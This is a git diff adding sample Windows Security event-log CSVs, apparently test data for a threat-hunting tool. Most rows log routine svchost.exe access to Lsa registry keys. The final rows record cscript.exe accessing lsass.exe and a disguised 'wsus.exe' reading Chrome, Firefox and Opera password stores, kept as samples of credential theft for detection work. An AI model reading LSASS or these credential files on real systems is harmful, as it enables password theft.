0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452829 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452828 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452827 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452826 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452825 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452824 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452823 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452822 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452821 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452820 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452819 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452818 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452817 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452816 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452815 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452814 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:14.634426+04:00,1553038514.634426,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452813 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452922 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452921 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452920 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452919 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.365477+04:00,1553038515.365477,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452918 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452917 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452916 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452915 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452914 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452913 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452912 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452911 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452910 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452909 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452908 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452907 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452906 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" diff --git a/source/samples/Sample_Process_Execution_Events.csv b/source/samples/Sample_Process_Execution_Events.csv new file mode 100644 index 0000000..9b38ae6 --- /dev/null +++ b/source/samples/Sample_Process_Execution_Events.csv @@ -0,0 +1,4130 @@ +DateTime,timestamp,EventID,ProcessName,User,ParentProcessName,RawLog +2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe," + + + + + 4688 + 2 + 0 + 13312 + 0 + 0x8020000000000000 + + + 329925 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + 0x24e0 + C:\Windows\System32\svchost.exe + %%1936 + 0x274 + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + C:\Windows\System32\services.exe + 